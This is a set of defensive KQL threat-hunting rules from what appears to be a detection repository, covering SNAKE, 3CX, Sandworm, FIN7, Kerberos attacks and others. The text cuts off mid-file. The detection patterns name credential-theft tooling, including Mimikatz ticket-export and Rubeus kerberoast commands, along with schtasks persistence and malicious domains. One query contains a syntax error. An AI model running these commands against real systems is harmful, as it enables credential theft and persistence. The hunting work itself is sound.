Privilege Escalation | [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068/) | 17 | 18 | #### Description 19 | Detects execution-related activities tied to the SNAKE malware as reported by CISA. This includes identifying kernel driver file indicators, suspicious filenames associated with SNAKE installation, specific command-line arguments, and installation binaries used during the malware execution. 20 | 21 | #### Risk 22 | The detection covers the execution of potentially harmful payloads and processes associated with the SNAKE malware. Attackers may leverage this for privilege escalation and to maintain persistence within compromised systems. 23 | 24 | #### Author 25 | - **Name:** Gavin Knapp 26 | - **Github:** [https://github.com/m4nbat](https://github.com/m4nbat) 27 | - **Twitter:** [https://twitter.com/knappresearchlb](https://twitter.com/knappresearchlb) 28 | - **LinkedIn:** [https://www.linkedin.com/in/grjk83/](https://www.linkedin.com/in/grjk83/) 29 | - **Website:** 30 | 31 | #### References 32 | - [CISA Report on Snake Malware](https://media.defense.gov/2023/May/09/2003218554/-1/-1/0/JOINT_CSA_HUNTING_RU_INTEL_SNAKE_MALWARE_20230509.PDF) 33 | 34 | --- 35 | 36 | ## Queries 37 | 38 | ### Query 1 - SNAKE Malware Kernel Driver File Indicator 39 | 40 | #### Description 41 | This query detects the presence of a SNAKE malware kernel driver file indicator by monitoring the specific file path in `DeviceFileEvents`. 42 | 43 | ```KQL 44 | DeviceFileEvents 45 | | where FolderPath =~ 'C:\Windows\System32\Com\Comadmin.dat' 46 | ``` 47 | ### Query 2 - SNAKE Malware Installer Name Indicators 48 | ### Description 49 | This query detects file names associated with the SNAKE malware installer as described in the CISA report, such as jpsetup.exe or jpinst.exe. 50 | 51 | ```KQL 52 | DeviceFileEvents 53 | | where (FolderPath endswith '\jpsetup.exe' or FolderPath endswith '\jpinst.exe') 54 | ``` 55 | ### Query 3 - Potential SNAKE Malware Installation CLI Arguments Indicator 56 | #### Description 57 | This query detects specific command line arguments seen during the installation of SNAKE malware. The command line pattern includes a sequence of alphanumeric characters in specific formats as observed by CISA. 58 | 59 | ```KQL 60 | DeviceProcessEvents 61 | | where ProcessCommandLine matches regex '(?i)\s[a-fA-F0-9]{64}\s[a-fA-F0-9]{16}' 62 | or InitiatingProcessCommandLine matches regex '(?i)\s[a-fA-F0-9]{64}\s[a-fA-F0-9]{16}' 63 | ``` 64 | 65 | ### Query 4 - Potential SNAKE Malware Installation Binary Indicator 66 | #### Description 67 | This query identifies the installation binary used by SNAKE malware during execution, focusing on files named jpsetup.exe and jpinst.exe and ensuring that the command line does not match certain benign processes or is not empty. 68 | 69 | ```KQL 70 | DeviceProcessEvents 71 | | where ((FolderPath endswith '\jpsetup.exe' or FolderPath endswith '\jpinst.exe') 72 | and not ((ProcessCommandLine in~ ('jpinst.exe', 'jpinst', 'jpsetup.exe', 'jpsetup')) 73 | or ProcessCommandLine == '' or isempty(ProcessCommandLine))) 74 | or ((InitiatingProcessFolderPath endswith '\jpsetup.exe' or InitiatingProcessFolderPath endswith '\jpinst.exe') 75 | and not ((InitiatingProcessCommandLine in~ ('jpinst.exe', 'jpinst', 'jpsetup.exe', 'jpsetup')) 76 | or InitiatingProcessCommandLine == '' or isempty(InitiatingProcessCommandLine))) 77 | ``` 78 | -------------------------------------------------------------------------------- /nf_ttp_generic_kerberos_attacks.md: -------------------------------------------------------------------------------- 1 | # Kerberos attacks 2 | 3 | ## Query Information 4 | 5 | #### MITRE ATT&CK Technique(s) 6 | 7 | | Technique ID | Title | Link | 8 | |--------------|-----------------------------|-------------------------------------------| 9 | |T1649 |Steal or Forge Authentication Certificates | https://attack.mitre.org/techniques/T1649/ | 10 | |T1558.003 |Kerberoasting | https://attack.mitre.org/techniques/T1558/003/ | 11 | |T1558 |Steal or Forge Kerberos Tickets | https://attack.mitre.org/techniques/T1558/ | 12 | |T1558.004 |AS-REP Roasting | https://attack.mitre.org/techniques/T1558/004/ | 13 | |T1558.001 |Golden Ticket | https://attack.mitre.org/techniques/T1558/001/ | 14 | |T1550.003 |Pass the Ticket | https://attack.mitre.org/techniques/T1550/003/ | 15 | |T1550.003 |Pass the Ticket | https://attack.mitre.org/techniques/T1550/003/ | 16 | |T1110 |Brute Force | https://attack.mitre.org/techniques/T1110/ | 17 | |T1558.002 |Silver Ticket | https://attack.mitre.org/techniques/T1558/002/ | 18 | 19 | #### Description 20 | 21 | #### Risk 22 | 23 | #### Author 24 | - **Name:** Gavin Knapp 25 | - **Github:** [https://github.com/m4nbat](https://github.com/m4nbat) 26 | - **Twitter:** [https://twitter.com/knappresearchlb](https://twitter.com/knappresearchlb) 27 | - **LinkedIn:** [https://www.linkedin.com/in/grjk83/](https://www.linkedin.com/in/grjk83/) 28 | - **Website:** 29 | 30 | #### References 31 | - Microsoft TI (Closed) 32 | - [stuff](link) 33 | 34 | ## Advanced Hunting 35 | 36 | ### Microsoft Defender Antivirus Detections 37 | 38 | ```KQL 39 | AlertInfo 40 | | where Title has_any ("Successful logon using overpass-the-hash with potentially stolen credentials","Command line used for possible overpass-the-hash") 41 | ``` 42 | 43 | #### The following alerts might also indicate activity associated with this threat. These alerts, however, can be triggered by unrelated threat activity and are not monitored in the status cards provided with this report: 44 | 45 | ```KQL 46 | AlertInfo 47 | | where Title has_any ("AD reconnaissance activities","Process related to possible AD reconnaissance","Suspicious Lsass Process Access","Bloodhound post-exploitation tool") 48 | ``` 49 | 50 | ### Microsoft Defender for Identity Detection 51 | ```KQL 52 | IdentityDirectoryEvents 53 | | where ActionType == "Potential lateral movement path identified" 54 | | project Timestamp, ActionType, Application, AccountName, AccountDomain, AccountSid, AccountDisplayName, DeviceName, AdditionalFields 55 | ``` 56 | 57 | ### Common Mimikatz command lines 58 | 59 | ```KQL 60 | DeviceProcessEvents 61 | | where ProcessCommandLine has_any ('sekurlsa::tickets /export', 'kerberos::ptt') 62 | | project Timestamp, AccountName, DeviceName, InitiatingProcessFileName, InitiatingProcessCommandLine, FileName, ProcessCommandLine 63 | ``` 64 | 65 | ### Common Rubeus command lines 66 | 67 | ```KQL 68 | DeviceProcessEvents 69 | | where ProcessCommandLine has_any ('ptt /ticket', ' monitor /interval', ' asktgt', ' asktgs', ' golden', ' silver', ' kerberoast', ' asreproast', ' renew', ' brute') 70 | | project Timestamp, AccountName, DeviceName, InitiatingProcessFileName, InitiatingProcessCommandLine, FileName, ProcessCommandLine 71 | ``` 72 | -------------------------------------------------------------------------------- /nf_ttp_ioc_3cx_DLL_SideLoading_IoC_Kusto.md: -------------------------------------------------------------------------------- 1 | # 3CX Users Under DLL-Sideloading Attack 2 | 3 | ## Query Information 4 | 5 | #### MITRE ATT&CK Technique(s) 6 | 7 | | Technique ID | Title | Link | 8 | | --- | --- | --- | 9 | | T1073 | DLL Side-Loading | https://attack.mitre.org/techniques/T1073/ 10 | | T1071 | Application Layer Protocol | https://attack.mitre.org/techniques/T1071/ | 11 | 12 | #### Description 13 | Sophos X-Ops is tracking a developing situation concerning a potential supply-chain attack against the 3CX Desktop application, possibly by a nation-state-related group. This threat is notable for its use of DLL sideloading. 14 | 15 | The attack involves compromising the 3CXDesktopApp and using it to sideload malicious DLLs onto targeted systems. This page provides an overview of the attack, threat analysis, and queries that can be used for detection in Microsoft Defender for Endpoint (MDE) and Azure Sentinel. 16 | 17 | #### Risk 18 | This detection aims to identify and mitigate risks related to supply chain attacks utilizing DLL-sideloading techniques. Attackers may leverage compromised software to gain unauthorized access to sensitive systems or data. 19 | 20 | #### Author 21 | - **Name:** Gavin Knapp 22 | - **Github:** [https://github.com/m4nbat](https://github.com/m4nbat) 23 | - **Twitter:** [https://twitter.com/knappresearchlb](https://twitter.com/knappresearchlb) 24 | - **LinkedIn:** [https://www.linkedin.com/in/grjk83/](https://www.linkedin.com/in/grjk83/) 25 | - **Website:** 26 | 27 | #### References 28 | - https://www.crowdstrike.com/blog/crowdstrike-detects-and-prevents-active-intrusion-campaign-targeting-3cxdesktopapp-customers/ 29 | - https://news.sophos.com/en-us/2023/03/29/3cx-dll-sideloading-attack/ 30 | - https://raw.githubusercontent.com/sophoslabs/IoCs/master/3CX%20IoCs%202023-03.csv 31 | 32 | ## Defender For Endpoint 33 | ### Combined IOC hunt 34 | ```KQL 35 | let urlioc = externaldata(indicator:string, data:string, note:string) 36 | [h@"https://raw.githubusercontent.com/sophoslabs/IoCs/master/3CX%20IoCs%202023-03.csv"] 37 | with(format="csv",ignoreFirstRecord=true) 38 | | where indicator =~ "sha256" 39 | | distinct data; 40 | let sha256ioc = externaldata(indicator:string, data:string, note:string) 41 | [h@"https://raw.githubusercontent.com/sophoslabs/IoCs/master/3CX%20IoCs%202023-03.csv"] 42 | with(format="csv",ignoreFirstRecord=true) 43 | | where indicator =~ "url" 44 | | distinct data; 45 | let iocs = union urlioc, sha256ioc 46 | | extend iocs = replace_regex(data, @"\[\.\]","."); 47 | DeviceEvents 48 | | where RemoteUrl has_any (iocs) or SHA256 in~ (iocs) 49 | ``` 50 | 51 | ### URL IOC hunt 52 | ```KQL 53 | let urlioc = externaldata(indicator:string, data:string, note:string) 54 | [h@"https://raw.githubusercontent.com/sophoslabs/IoCs/master/3CX%20IoCs%202023-03.csv"] 55 | with(format="csv",ignoreFirstRecord=true) 56 | | where indicator =~ "url" 57 | | extend iocs = replace_regex(data, @"\[\.\]",".") 58 | | distinct iocs; 59 | DeviceEvents 60 | | where RemoteUrl has_any (urlioc) 61 | ``` 62 | 63 | ### File hash IOC hunt 64 | ```KQL 65 | let sha256ioc = externaldata(indicator:string, data:string, note:string) 66 | [h@"https://raw.githubusercontent.com/sophoslabs/IoCs/master/3CX%20IoCs%202023-03.csv"] 67 | with(format="csv",ignoreFirstRecord=true) 68 | | where indicator =~ "sha256" 69 | | distinct data; 70 | DeviceFileEvents 71 | | where SHA256 in~ (sha256ioc) 72 | ``` 73 | ### Software hunt 74 | ```KQL 75 | DeviceTvmSoftwareInventory 76 | | where SoftwareName has_any ("3CXDesktopApp.exe", "3CX Desktop App") 77 | ``` 78 | 79 | ### Software hunt 2 80 | ```KQL 81 | DeviceNetworkEvents 82 | | where InitiatingProcessFileName has_any ("3CXDesktopApp.exe","3CXDesktopApp","3CX") 83 | ``` 84 | 85 | -------------------------------------------------------------------------------- /nf_ttp_kapeka_sandworm.md: -------------------------------------------------------------------------------- 1 | //Example QUEUESEED for the batch file 2 | //TTP QUEUESEED malware behaviour 3 | //UA CERT Article 4 | //https://medium.com/detect-fyi/uac-0133-sandworm-plans-for-cyber-sabotage-at-almost-20-critical-infrastructure-facilities-in-d923a6cbcef4 5 | //https://cert.gov.ua/article/6278706 6 | DeviceProcessEvents 7 | | where ( ProcessCommandLine has_all ("%COMSPEC%",@"/c",@"%APPDATA%\",".bat") or InitiatingProcessCommandLine has_all ("%COMSPEC%",@"/c",@"%APPDATA%\",".bat") ) 8 | 9 | //Example KAPEKA for the batch file 10 | //TTP KAPEKA malware behaviour 11 | //UA CERT Article 12 | //https://medium.com/detect-fyi/uac-0133-sandworm-plans-for-cyber-sabotage-at-almost-20-critical-infrastructure-facilities-in-d923a6cbcef4 13 | //https://cert.gov.ua/article/6278706 14 | DeviceProcessEvents 15 | | where ( ProcessCommandLine has_all (@"C:\Windows\system32\cmd.exe",@"/c",@"C:\Users\",@"\AppData\",".bat") or ProcessCommandLine has_all (@"C:\Windows\system32\cmd.exe",@"/c",@"C:\Users\",@"\AppData\",".bat") ) 16 | 17 | //Additional registry entries for the backdoor for SENS API (KAPEKA) 18 | //Scheduled Task Persistence Mechanisms 19 | //https://medium.com/detect-fyi/uac-0133-sandworm-plans-for-cyber-sabotage-at-almost-20-critical-infrastructure-facilities-in-d923a6cbcef4 20 | //https://cert.gov.ua/article/6278706 21 | DeviceProcessEvents 22 | | where ProcessCommandLine has_all ("/c","schtasks","/create","/sc","ONSTART","/tn","Sens Api","/f","/np","/tr",".wll") 23 | 24 | //Additional registry entries for the backdoor for SENS API (KAPEKA) 25 | //Scheduled Task Persistence Mechanisms 26 | //https://medium.com/detect-fyi/uac-0133-sandworm-plans-for-cyber-sabotage-at-almost-20-critical-infrastructure-facilities-in-d923a6cbcef4 27 | //https://cert.gov.ua/article/6278706 28 | DeviceRegistryEvents 29 | | where ActionType =~ "RegistryValueSet" and RegistryKey endswith @"\Windows\CurrentVersion\Run" and RegistryValueName =~ "Sens Api" and RegistryValueData has_all (@"rundll32.exe",@".wll",@"#1") 30 | -------------------------------------------------------------------------------- /nf_ttp_polyfill_supplychain_attack.md: -------------------------------------------------------------------------------- 1 | # Polyfill Supply Chain Attack Detection 2 | 3 | #### MITRE ATT&CK Technique(s) 4 | 5 | | Technique ID | Title | Link | 6 | | --- | --- | --- | 7 | | T1071.001 | Application Layer Protocol: Web Protocols | [Application Layer Protocol: Web Protocols](https://attack.mitre.org/techniques/T1071/001/) | 8 | 9 | #### Description 10 | This detection rule identifies network events related to the recent Polyfill supply chain attack where malicious domains such as `googie-anaiytics.com` and `kuurza.com` were used to exfiltrate data. 11 | 12 | #### Risk 13 | This detection rule addresses the risk of data exfiltration and potential compromise from the Polyfill supply chain attack. The malicious domains involved are indicators of compromise (IOCs) used to identify infected systems attempting to communicate with the attacker's infrastructure. 14 | 15 | #### Author 16 | - **Name:** Gavin Knapp 17 | - **Github:** [https://github.com/m4nbat](https://github.com/m4nbat) 18 | - **Twitter:** [https://twitter.com/knappresearchlb](https://twitter.com/knappresearchlb) 19 | - **LinkedIn:** [https://www.linkedin.com/in/grjk83/](https://www.linkedin.com/in/grjk83/) 20 | - **Website:** 21 | 22 | #### References 23 | - [Sansec Research on Polyfill Supply Chain Attack](https://sansec.io/research/polyfill-supply-chain-attack) 24 | - https://kqlquery.com/ 25 | - https://github.com/Bert-JanP/Hunting-Queries-Detection-Rules 26 | 27 | ## Defender For Endpoint 28 | 29 | ```KQL 30 | // Query to detect HTTP connections to malicious domains 31 | DeviceNetworkEvents 32 | | where ActionType == @"HttpConnectionInspected" 33 | | extend ConnectInfo = todynamic(AdditionalFields) 34 | | extend HttpHost = ConnectInfo.host 35 | | where HttpHost contains "googie-anaiytics.com" or HttpHost contains "kuurza.com" 36 | ``` 37 | 38 | ```KQL 39 | // Query to detect DNS responses for malicious domains 40 | DeviceNetworkEvents 41 | | where ActionType == "DnsQueryResponse" 42 | | extend QueryInfo = todynamic(AdditionalFields) 43 | | extend DnsQuery = QueryInfo.query 44 | | where DnsQuery contains "googie-anaiytics.com" or DnsQuery contains "kuurza.com" 45 | ``` 46 | -------------------------------------------------------------------------------- /nf_ttp_possibleExfiltrationViaUSB.md: -------------------------------------------------------------------------------- 1 | # * Possible Exfiltration via USB Detection* 2 | 3 | ## Query Information 4 | 5 | #### MITRE ATT&CK Technique(s) 6 | 7 | | Technique ID | Title | Link | 8 | |--------------|-----------------------------------|-------------------------------------------------------| 9 | | T1052.001 | Exfiltration Over Physical Medium: Exfiltration over USB| [Exfiltration Over Physical Medium: Exfiltration over USB](https://attack.mitre.org/techniques/T1052/001) | 10 | 11 | #### Description 12 | Adversaries such as insiders have been known to exfilrate data via removable media such as USB devices. 13 | 14 | #### Risk 15 | Removable media including USB can present a data loss risk to organisations. 16 | 17 | #### Author 18 | - **Name:** Nathan Webb 19 | - **Github:** 20 | - **Twitter:** 21 | - **LinkedIn:** [https://www.linkedin.com/in/nathanjohnwebb](htps://www.linkedin.com/in/nathanjohnwebb) 22 | - **Website:** 23 | 24 | #### References 25 | - [Threat hunt] Detecting Possible USB Data Exfiltration 26 | https://www.linkedin.com/pulse/threat-hunt-detecting-possible-usb-data-exfiltration-nathan-webb-t3ode?utm_source=share&utm_medium=member_android&utm_campaign=share_via 27 | 28 | ## Defender For Endpoint 29 | 30 | ```KQL 31 | let LookBackPeriod=14d; // How long to look back for USB activity 32 | let DetectionPeriod=1d; 33 | let DeviceConnectedCopiedWindow=1h; // adjust to have a longer time range between device connected and files copied 34 | let SystemDrive=dynamic(['C:', 'D:']); // add known system drive paths in here 35 | DeviceEvents 36 | | where Timestamp > ago(LookBackPeriod) 37 | | where ActionType contains "PnpDeviceConnected" 38 | | extend DeviceType = tostring(todynamic(AdditionalFields).ClassName) 39 | | extend UsbId = tostring(todynamic(AdditionalFields).DeviceId) 40 | | where DeviceType contains "drive" or DeviceType contains "disk" 41 | // get a count of how many times that USB vendor and id has been inserted (this just identifies the type of device and is not a unique ID per USB device) 42 | // bin our timestamp so we can join on this time window when searching for USB events 43 | | summarize FirstSeen=min(Timestamp), TimesDriveConnected=count() by UsbId, bin(Timestamp, DeviceConnectedCopiedWindow), DeviceId, DeviceName 44 | | where FirstSeen > ago(DetectionPeriod) 45 | // do a join to get copied files from the host that occur within the same timeeframe 46 | | join (DeviceFileEvents 47 | | where Timestamp > ago(DetectionPeriod) 48 | | where ActionType == "FileCreated" 49 | | where FileOriginReferrerUrl contains @"\" // file has come from a windows path 50 | | extend SourceDrive=tostring(split(FileOriginReferrerUrl, @"\")[0]) // get the drive letter of the system path 51 | | extend DestDrive=tostring(split(FolderPath, @"\")[0]) // get the drive letter of where the file was written to 52 | | where SourceDrive has_any (SystemDrive) and not(DestDrive has_any (SystemDrive)) // a copy off the system drive 53 | | summarize FilesPathsCopied=make_set(FolderPath, 1000), FileCopiesCount=count() by SourceDrive, DestDrive, DeviceId, DeviceName, bin(Timestamp, DeviceConnectedCopiedWindow)) 54 | on DeviceId, Timestamp 55 | ``` -------------------------------------------------------------------------------- /nf_ttp_shadowlink_sandworm.md: -------------------------------------------------------------------------------- 1 | Sandworm - ShadowLink 2 | 3 | //Malware related alert for this variant: 4 | SecurityAlert 5 | | where AlertName contains "ShadowLink" 6 | 7 | //Persistence: 8 | DeviceEvents 9 | | where ActionType == 'ServiceInstalled' 10 | | extend JSON = parse_json(AdditionalFields) 11 | | where JSON.ServiceName has 'tor' 12 | | extend SourceTenant = TenantId 13 | | join kind=leftouter tid_lookup on $left.SourceTenant == $right.id 14 | | project-away id 15 | | summarize count() by name 16 | -------------------------------------------------------------------------------- /nf_ttp_smoke-sandstorm_unusual_coreuicomponent.dll-behaviour.md: -------------------------------------------------------------------------------- 1 | # Smoke Sandstorm - SnailResin and SlugResin Infection Detection 2 | 3 | ## Query Information 4 | 5 | #### MITRE ATT&CK Technique(s) 6 | 7 | | Technique ID | Title | Link | 8 | |--------------|-----------------------------|-------------------------------------------| 9 | | T1574.002 | Hijack Execution Flow: DLL Search Order Hijacking | [Hijack Execution Flow: DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/002/) | 10 | | T1059.003 | Command and Scripting Interpreter: Windows Command Shell | [Command and Scripting Interpreter: Windows Command Shell](https://attack.mitre.org/techniques/T1059/003/) | 11 | 12 | #### Description 13 | SlugResin infection involves the use of a legitimate file to load a malicious binary through DLL search order hijacking, delivering the SlugResin backdoor onto the target's device. This backdoor grants the actor access to the compromised device, potentially leading to further malicious activities like malware deployment, credential theft, privilege escalation, and lateral movement. The infection involves a two-stage process with the SnailResin loader and SlugResin backdoor, both associated with the Smoke Sandstorm threat group. The infection chain includes the use of a zip file ("bringthemhome.zip") containing malicious DLL files and a benign executable, which leads to the execution of the backdoor and establishment of a command-and-control connection. 14 | 15 | #### Risk 16 | The risk addressed by this detection is the stealthy execution of malicious code through DLL hijacking, enabling persistent access and control over compromised systems. The ability of this technique to blend in with normal activity makes it particularly dangerous. 17 | 18 | #### Author 19 | - **Name:** Gavin Knapp 20 | - **Github:** [https://github.com/m4nbat](https://github.com/m4nbat) 21 | - **Twitter:** [https://twitter.com/knappresearchlb](https://twitter.com/knappresearchlb) 22 | - **LinkedIn:** [https://www.linkedin.com/in/grjk83/](https://www.linkedin.com/in/grjk83/) 23 | - **Website:** 24 | 25 | #### References 26 | - Microsoft TI (Closed) 27 | - [Microsoft Documentation on DLL Search Order Hijacking](https://docs.microsoft.com/en-us/security/engineering/dll-search-order-hijacking) 28 | 29 | ## Advanced Hunting 30 | 31 | ### Unusual CoreUIComponent.dll Behaviour Detection 32 | 33 | ```KQL 34 | DeviceImageLoadEvents 35 | | where FileName == 'CoreUIComponent.dll' 36 | | where not(FolderPath has_any (@"\Windows\System32", @"\Windows\SysWOW64", @"\winsxs\", @"\program files")) 37 | ``` 38 | 39 | ### Microsoft Defender Antivirus Detections 40 | 41 | ```KQL 42 | AlertInfo 43 | | where Title has_any ("An executable loaded an unexpected dll","DLL search order hijack","Possible Sideload stealer activity","Possible S1deload stealer activity","Smoke Sandstorm activity group") 44 | ``` 45 | ### Microsoft Defender for Endpoint Alerts 46 | 47 | ```KQL 48 | let malware = datatable (name:string)["Trojan:Win64/SnailResin","Backdoor:Win64/SlugResin","Trojan:Win32/BassBreaker"]; 49 | AlertInfo 50 | | join AlertEvidence on AlertId 51 | | extend Malware = tostring(parse_json(AdditionalFields).Name) 52 | | where ( EntityType =~ "Malware" ) and isnotempty(Malware) and Malware has_any(malware) 53 | ``` 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | -------------------------------------------------------------------------------- /nf_ttp_t1027-010_powershellEcodedCommand.md: -------------------------------------------------------------------------------- 1 | # TTP Detection Rule: PowerShell -encodedcommand switch 2 | 3 | ## Query Information 4 | 5 | #### MITRE ATT&CK Technique(s) 6 | 7 | | Technique ID | Title | Link | 8 | | --- | --- | --- | 9 | | T1027.010 | Obfuscated Files or Information: Command Obfuscation | [Command Obfuscation](https://attack.mitre.org/techniques/T1027/010/)| 10 | 11 | #### Description 12 | Detection opportunity 4: PowerShell -encodedcommand switch 13 | 14 | We also observed at least one of these adversaries abusing the shortened -encoded PowerShell command switch to encode PowerShell commands. This is another common bit of tradecraft. The following should help detect and hunt for the behaviour. 15 | 16 | #### Risk 17 | FIN7, ZLoader, and FakeBat have been observed performing this behaviour in recent intrusions. Adversaries may encode commands to evade defenses. 18 | 19 | #### Author 20 | - **Name:** Gavin Knapp 21 | - **Github:** https://github.com/m4nbat 22 | - **Twitter:** https://twitter.com/knappresearchlb 23 | - **LinkedIn:** https://www.linkedin.com/in/grjk83/ 24 | - **Website:** 25 | 26 | #### References 27 | - [redcanary](https://redcanary.com/blog/msix-installers/) 28 | 29 | ## Defender For Endpoint 30 | ```KQL 31 | //this will be noisy and no good for a SIEM analytic 32 | DeviceProcessEvents 33 | | where FileName =~ "powershell.exe" and ProcessCommandLine has_any ("-e","-en","-enc","-enco","-encod","-encode","-encoded","-encodedc","-encodedco","-encodedcom","-encodedcomm","-encodedcomma","-encodedcomman","-encodedcommand") 34 | ``` 35 | ## Sentinel 36 | ```KQL 37 | //this will be noisy and no good for a SIEM analytic 38 | DeviceProcessEvents 39 | | where FileName =~ "powershell.exe" and ProcessCommandLine has_any ("-e","-en","-enc","-enco","-encod","-encode","-encoded","-encodedc","-encodedco","-encodedcom","-encodedcomm","-encodedcomma","-encodedcomman","-encodedcommand") 40 | ``` 41 | -------------------------------------------------------------------------------- /nf_ttp_t1059-001_powershell_windowsappsdir_fin7.md: -------------------------------------------------------------------------------- 1 | # TTP Detection Rule: PowerShell Launching Scripts From WindowsApps Directory (FIN7) 2 | 3 | ## Query Information 4 | 5 | #### MITRE ATT&CK Technique(s) 6 | 7 | | Technique ID | Title | Link | 8 | | --- | --- | --- | 9 | | T1059.001 | Command and Scripting Interpreter: PowerShell | [Command and Scripting Interpreter: PowerShell](https://attack.mitre.org/techniques/T1059/001/)| 10 | 11 | #### Description 12 | Detection opportunity: Launching PowerShell scripts from **windowsapps** directory 13 | 14 | This pseudo-detector looks for the execution of PowerShell scripts from the windowsapps directory. There are instances where benign PowerShell scripts run from this directory, but analysts can sort out malicious or suspicious activity by investigating follow-on actions and network connections. However, in this case we see the adversary calling `StartingScriptWrapper.ps1` from the windowsapps directory to execute their malicious payload script. 15 | 16 | #### Risk 17 | FIN7 have been observed performing this behaviour in recent intrusions. FIN7 activity has frequently preceded ransomware deployment. We’ve detected activity within this cluster attempting to install malicious instances of NetSupport Manager RAT. In the detections we’ve observed within this cluster, the adversary leverages the MSIX-PackageSupportFramework tool to create their malicious MSIX files. When the victim opens the MSIX, the StartingScriptWrapper.ps1 component of the MSIX package support framework launches an embedded PowerShell script from the windowsapps directory. 18 | 19 | #### Author 20 | - **Name:** Gavin Knapp 21 | - **Github:** https://github.com/m4nbat 22 | - **Twitter:** https://twitter.com/knappresearchlb 23 | - **LinkedIn:** https://www.linkedin.com/in/grjk83/ 24 | - **Website:** 25 | 26 | #### References 27 | - [redcanary](https://redcanary.com/blog/msix-installers/) 28 | 29 | ## Defender For Endpoint 30 | ```KQL 31 | DeviceProcessEvents 32 | | where InitiatingProcessFolderPath contains "windowsapps" and FileName =~ "powershell.exe" and ProcessCommandLine has_all ("windowsapps","-file",".ps1") 33 | ``` 34 | ## Sentinel 35 | ```KQL 36 | DeviceProcessEvents 37 | | where InitiatingProcessFolderPath contains "windowsapps" and FileName =~ "powershell.exe" and ProcessCommandLine has_all ("windowsapps","-file",".ps1") 38 | ``` 39 | -------------------------------------------------------------------------------- /nf_ttp_t1127-001_suspNetworkConnMSBuild.md: -------------------------------------------------------------------------------- 1 | # TTP Detection Rule: Suspicious network connection from MSBuild 2 | 3 | ## Query Information 4 | 5 | #### MITRE ATT&CK Technique(s) 6 | 7 | | Technique ID | Title | Link | 8 | | --- | --- | --- | 9 | | T1127.001 | Trusted Developer Utilities Proxy Execution: MSBuild | [MSBuild](https://attack.mitre.org/techniques/T1562/001/)| 10 | 11 | #### Description 12 | Detection opportunity: MSBuild without commands 13 | 14 | In some detections, we observed the Microsoft Build Engine (msbuild.exe) making outbound network connections to IPs associated with the ArechClient2 remote access tool. In general, it is suspicious for msbuild.exe to execute without a corresponding command line, which is precisely what we observed here. Simply looking for execution of msbuild.exe without a corresponding command line and examining surrounding activity for suspicious network connections and child processes could help detect this threat. 15 | 16 | #### Risk 17 | FIN7, ZLoader, and FakeBat have been observed performing this behaviour in recent intrusions. Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. 18 | 19 | #### Author 20 | - **Name:** Gavin Knapp 21 | - **Github:** https://github.com/m4nbat 22 | - **Twitter:** https://twitter.com/knappresearchlb 23 | - **LinkedIn:** https://www.linkedin.com/in/grjk83/ 24 | - **Website:** 25 | 26 | #### References 27 | - [redcanary](https://redcanary.com/blog/msix-installers/) 28 | 29 | ## Defender For Endpoint 30 | ```KQL 31 | // Detection opportunity 5: MSBuild without commands 32 | DeviceNetworkEvents 33 | | where InitiatingProcessFileName =~ "msbuild.exe" and (isempty(InitiatingProcessCommandLine) or InitiatingProcessCommandLine =~ "msbuild.exe") 34 | ``` 35 | ## Sentinel 36 | ```KQL 37 | // Detection opportunity 5: MSBuild without commands 38 | DeviceNetworkEvents 39 | | where InitiatingProcessFileName =~ "msbuild.exe" and (isempty(InitiatingProcessCommandLine) or InitiatingProcessCommandLine =~ "msbuild.exe") 40 | ``` 41 | -------------------------------------------------------------------------------- /nf_ttp_t1219_netsupportrat_fin7.md: -------------------------------------------------------------------------------- 1 | # TTP Detection Rule: NetSupport running from unexpected directory (FIN7) 2 | 3 | ## Query Information 4 | 5 | #### MITRE ATT&CK Technique(s) 6 | 7 | | Technique ID | Title | Link | 8 | | --- | --- | --- | 9 | | T1219 | Remote Access Software | [Remote Access Software](https://attack.mitre.org/techniques/T1219/)| 10 | 11 | #### Description 12 | Detection opportunity: NetSupport running from unexpected directory 13 | 14 | In the instances where the adversary delivered NetSupport Manager RAT as a follow-on payload, our existing detection coverage for malicious NetSupport installation served us well. Under normal circumstances, you should expect NetSupport Manager to run from the program files directory. If you find NetSupport Manager—often identifiable as client32.exe—running outside the program files directory, particularly from the programdata directory, then it’s worth investigating. 15 | 16 | #### Risk 17 | FIN7 have been observed performing this behaviour in recent intrusions. FIN7 activity has frequently preceded ransomware deployment. We’ve detected activity within this cluster attempting to install malicious instances of NetSupport Manager RAT. In the detections we’ve observed within this cluster, the adversary leverages the MSIX-PackageSupportFramework tool to create their malicious MSIX files. When the victim opens the MSIX, the StartingScriptWrapper.ps1 component of the MSIX package support framework launches an embedded PowerShell script from the windowsapps directory. 18 | 19 | #### Author 20 | - **Name:** Gavin Knapp 21 | - **Github:** https://github.com/m4nbat 22 | - **Twitter:** https://twitter.com/knappresearchlb 23 | - **LinkedIn:** https://www.linkedin.com/in/grjk83/ 24 | - **Website:** 25 | 26 | #### References 27 | - [redcanary](https://redcanary.com/blog/msix-installers/) 28 | 29 | ## Defender For Endpoint 30 | ```KQL 31 | // Detection opportunity 2: NetSupport running from unexpected directory 32 | DeviceProcessEvents 33 | | where ( ProcessVersionInfoCompanyName contains "netsupport" or ProcessVersionInfoProductName contains "netsupport" ProcessVersionInfoCompanyName contains "Crosstec" or ProcessVersionInfoProductName contains "Crosstec") and not ( FolderPath has_any ("Program Files (x86)\\","Program Files\\")) 34 | ``` 35 | ## Sentinel 36 | ```KQL 37 | // Detection opportunity 2: NetSupport running from unexpected directory 38 | DeviceProcessEvents 39 | | where ( ProcessVersionInfoCompanyName contains "netsupport" or ProcessVersionInfoProductName contains "netsupport" ProcessVersionInfoCompanyName contains "Crosstec" or ProcessVersionInfoProductName contains "Crosstec") and not ( FolderPath has_any ("Program Files (x86)\\","Program Files\\")) 40 | ``` 41 | -------------------------------------------------------------------------------- /nf_ttp_t1543_scattered-spider_azure_arc_persistence.md: -------------------------------------------------------------------------------- 1 | # Azure ARC Related Persistence Detection 2 | 3 | ## Query Information 4 | 5 | #### MITRE ATT&CK Technique(s) 6 | 7 | | Technique ID | Title | Link | 8 | |--------------|----------------------------------|----------------------------------------| 9 | | T1543 | Create or Modify System Process | [Create or Modify System Process](https://attack.mitre.org/techniques/T1543/) | 10 | 11 | #### Description 12 | This detection rule aims to identify the unexpected installation of Azure ARC agents. Scattered Spider has been known to register their own Azure tenant and install Azure ARC agents on devices to maintain persistence. The rule includes two queries: one for detecting service installations and another for identifying specific file path creations associated with Azure ARC agents. 13 | 14 | #### Risk 15 